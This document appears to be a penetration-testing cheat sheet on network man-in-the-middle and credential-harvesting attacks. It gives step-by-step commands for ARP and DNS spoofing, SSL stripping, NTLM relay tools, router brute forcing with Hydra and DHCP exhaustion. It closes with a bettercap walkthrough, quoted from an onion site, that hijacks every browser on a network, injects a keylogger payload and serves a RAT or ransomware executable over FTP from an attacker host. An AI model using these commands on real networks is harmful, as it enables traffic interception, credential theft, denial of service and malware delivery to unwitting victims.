Network Attacks /Harvesting/MITM
Last updated
Last updated
Responder - LLMNR/NBT-NS/mDNS Poisoner.
MultiRelay.py - Tool within the Responder pack to perform NTLM Relay attacks.
Operator Handbook: Responder - pg. 265
Impacket Scripts
ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.
karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified.
smbserver.py: A Python implementation of an SMB server. Allows to quickly set up shares and user accounts.
Scapy -powerful Python library that allows full packet manipulation. It is a particularly useful tool to use when Nmap is unavailable or when less noise on the wire is needed.
Create an IP packet with the destination field set to our target host:
IP(dst=0.0.0.0)
This can then be amended as follows to create an ICMP packet:
test_packet = IP(dst="0.0.0.0")/ICMP()
The sr1() function will then send the packet on the wire:
sr1(test_packet)
</
mitm6 - mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server.
Flamingo - Captures credentials sprayed across the network by various IT and security products.
Operator Handbook: Flamingo - pg. 65
Inveigh - Inveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers.
Can be used similarly to Responder and MultiRelay
Espionage - Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc.
BruteShark - BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files, but it also capable of directly live capturing from a network interface). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack.
Yersina - A framework for layer 2 attacks
StreamDivert - Redirecting (specific) TCP, UDP and ICMP traffic to another destination.
PortBender - PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic destined for one TCP port (e.g., 445/TCP) to another TCP port (e.g., 8445/TCP).
LDAP-Password-Hunter - a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database.
NTLM Relay
Divert - WinDivert: Windows Packet Divert
DivertTCPconn - A TCP packet diverter for Windows platform
https://book.hacktricks.xyz/pentesting/pentesting-network#lan-attacksd
ARP cache poisoning
First you must set up IP forwarding to forward any extraneous packets received to their proper destination
# echo 1 > /proc/sys/net/ipv4/ip_forward
Display your machine's current ARP cache
# arp -a
Use the arpspoof command to masquerade as another IP
#arpspoof -i eth0 -t [target IP] [IP to spoof as]
To set up an ARP MITM you will need to set it up in both directions
#arpspoof -i eth0 -t [IP1] [IP2]
#arpspoof -i eth0 -t [IP2] [IP1]
You can set one of the IPs as your default gateway then start wireshark to capture all traffic a target creates going outbound
Attacks after ARP Spoofing
Sidejacking - Sniffing session tokens and using them to auth the user
Use Firesheep
Hampster/Ferret - acts as a proxy server and replaces you cookies with session cookies stolen from someone else
dhcpig - DHCPig initiates an advanced DHCP exhaustion attack. It will consume all IPs on the LAN, stop new users from obtaining IPs, release any IPs in use, then for good measure send gratuitous ARP and knock all windows hosts offline.
# pig.py eth0
SSL MITM
For an SSL MITM attack we will be using the tool ettercap
Ettercap can also be used for an ARP or DNS MITM as well
First we will start an ARP cache poisoning attack between the target and the gateway
#ettercap -Ti eth0 -M arp:remote /[ip1]/ /[ip2]/
This will prompt a certificate error when people navigate to a website
SSL stripping attack
We MITM the http connection before its redirected to SSL and add SLL functionality before sending the packets to the web server
When the server replies, ssl stripping intercepts the https tags before sending the packets to the through SSLstrip.
We will run SSLstrip on port 8080, then restart arpspoof and spoof the default gateway.
◇ # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Now we start SSLstrip on the outgoing port.
#sslstrip -l 8080
Router Sploit - https://www.github.com/threat9/routersploit
Download and install Routersploit - a framework for exploiting routers.
#git clone https://www.github.com/threat9/routersploit
#cd routersploit
#python3 -m pip install -r requirements.txt
#python3 rsf.py
Running Routersploit
# python3 rsf.py
rsf> use scanners/autopwn
rsf> show options
rsf> set target [router ip]
run
Brute forcing the router admin interface
For when defaults dont work and you really need it.
Uses
Enable port forwarding
Change router DNS settings
Change password and lockout owner
First find a username, attempt what ever the defautl username is
Next use basic wordlists to attempt a crack
Process
Use Burp Suite to capture HTTP proxy request via Firefox
Use the repeater tool or Hydra to brute force attempt the password
Be aware, the burpsuite free version throttles the amount of requests you are able to perform
Hydra
hydra 192.168.0.1 http-post-form "/goform/formLogin:login=^USER^&pass=^PASS^:F=User Name or Password is incorrect." -l admin -P pass.txt -vV -f
Breaking down the syntax is as follows:
http-post-form tells Hydra you're targeting a web login form HTTP POST data.
/goform/formLogin is the path we need to tell Hydra where the login page is.
login=^USER^&pass=^PASS^ is the POST data we catpured from Burp Suite but we replaced "admin" and "PASSWORD" with "^USER^" and "^PASS^" in order to tell Hydra where the username and password fields are. This way Hydra knows what to brute force.
F=User Name or Password is incorrect tells Hydra what is displayed when failed credentials are entered.
The failed login comments are good for Hydra to determine success and failure.
-l admin states that you're using "admin" as the username.
-P pass.txt is the password file with passwords in it line by line.
-f tells Hydra to stop once it finds a successful match.
-vV to be verbose and show the attempts.
See the Special Targets section for more tools on attacking Cisco Devices
Most MITM programs use SSLStrip/SSLstrip+ to intercept HTTPS data by "downgrading" them to HTTP.
SSLStrip+ will work against TLS and SSL if HSTS is not used.
SSLStrip+ will work on anything that does not have HSTS preloaded.
SSLStrip+ will only work on non-preloaded HSTS websites.
We can intercept HTTPS non-HSTS websites but users are presented with multiple warnings before visiting the desired website.
We cannot MITM anything HSTS related (FaceBook, Twitter, IG, etc.).
For best results
An attacker computer running Kali directly from USB or as the host OS.
A separate computer to be the target (Windows or MacOS preferably).
Attacker and Target computer/laptops connected to the same home network as you with internet connectivity.
Restart Kali after each tool example.
BetterCap - Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
In Kali open up a new Terminal window and type the following:
#sudo bettercap
All of the following commands below are to be entered into the bettercap window.
#net.probe on
Wait 30 seconds for it to discover network hosts.
#net.probe off
#net.show
This will show you the targets on the network. Pay attention to your target IP.
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
net.sniff on
http.proxy on
arp.spoof on
In Kali open up a new terminal window and type the following:
#sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP.
set https.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
set arp.spoof.internal true
net.sniff on
https.proxy on
arp.spoof on
In Kali open up a new Terminal window and type the following:
#sudo service apache2 restart
#sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP. ◇ set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
set dns.spoof.domains
set dns.spoof.address ATTACKER_IP
My example:
set dns.spoof.address 192.168.2.233
set dns.spoof.all true
net.sniff on
http.proxy on
arp.spoof on
dns.spoof on
In Kali open up a new terminal window and type the following:
#sudo service apache2 restart
#sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP.
set https.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
set dns.spoof.domains
set dns.spoof.address ATTACKER_IP
My example:
set dns.spoof.address 192.168.2.233
set dns.spoof.all true
net.sniff on
https.proxy on
arp.spoof on
dns.spoof on
Quoted directly from http://hacktownpagdenbb.onion/Links2/Chapter-11.html Easy FTP server • In Kali open up a new Terminal window and type the following: • git clone https://github.com/byt3bl33d3r/MITMf.git • sudo cp ~/MITMf/config/captive/portal.html /var/www/html/index.html • pip3 install pyftpdlib Bettercap has these things called "caplets" which come preinstalled that are modules that you're able to load to get a certain task done. We're going to use a bettercap caplet along with a combination of another For this example: My attacker computer IP is 192.168.2.233 My target computer IP is 192.168.2.100 In Kali open up a new Terminal window and type the following: sudo service apache2 restart sudo bettercap All the following commands below are to be entered into the bettercap window. net.probe on Wait 30 seconds for it to discover network hosts. net.probe off net.show This will show you the targets on the network. Pay attention for your targets IP. set arp.spoof.targets TARGET_IP My example: set arp.spoof.targets 192.168.2.100 To attack the whole network: set arp.spoof.targets * set arp.spoof.internal true set dns.spoof.address ATTACKER_IP My example: set dns.spoof.address 192.168.2.233 set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log set hstshijack.ignore * set hstshijack.targets *.cn,*.org, www.*, *.com, *.net set hstshijack.replacements *.ce, *.orq, wvvw.*,*.corn,*.nel set hstshijack.obfuscate false set hstshijack.encode true set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.pws,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.pws,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google.pws,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google.pws The above command "set hstshijack.payloads ..." is all one line so please copy and paste it. http.proxy on arp.spoof on dns.spoof on Leave the bettercap window running. This attack will completely break the web browser and not allow the target to visit any HTTPS or HTTP website. Any web requests will be re-routed to our attacker page. If they type anything into the URL bar in Google Chrome when running this attack Chrome will recommend the HTTP version of what they're looking for and "help" the victim navigate to our web attack page which is great for us! In order to deliver your malware in the future you would need to edit /var/www/html/index.html to reflect your own file. Remember, in this chapter we copied the ~/MITMf/config/captive/portal.html to /var/www/html/index.html. For my example my malware will be called "DANGER.exe" and the file is located in "/var/www/html" which is the default Apache2 web server directory. If you had a RAT you would need to put the file into the "/var/www/html" directory and adjust the filename in /var/www/html/index.html to reflect your own RAT executable name. Obviously! We're going to navigate to /var/www/html and run a FTP server delivering the contents of that directory and we're going to alter /var/www/html/index.html to reflect our executable name. This will allow the target to download our malware over FTP since we're re-directing everything web related on the network. In Kali open up a new Terminal window and type the following: cd /var/www/html python3 -m pyftpdlib -w This will run a FTP server on port 2121. Leave this window running. If you're familiar with python the above command "python3 -m pyftpdlib -w" is the "python -m SimpleHTTPServer 80" equivalent but for FTP. In a nut shell it's a super easy way of bringing up a FTP server without config files and shit. You can script all this shit so it's automatic depending on your coding levels. Basic shit commander Cobra. In Kali open up a new Terminal window and type the following: sudo leafpad /var/www/html/index.html Change "CaptiveClient.exe" to "ftp://ATTACKER_IP:2121/YOUR_FILE.exe" My Example: ftp://192.168.2.233:2121/DANGER.exe Save the file and close it. Now that we have the /var/www/html/index.html file configured (you would need to replace DANGER.exe with your RAT filename. This should be obvious!) the attack is ready. In the future you'd want to run the FTP server before using bettercap. This attack will break all HTTPS and HTTP websites the victim is trying to browse and will re-direct them to your web server with your malware/ransomware waiting to be downloaded over FTP.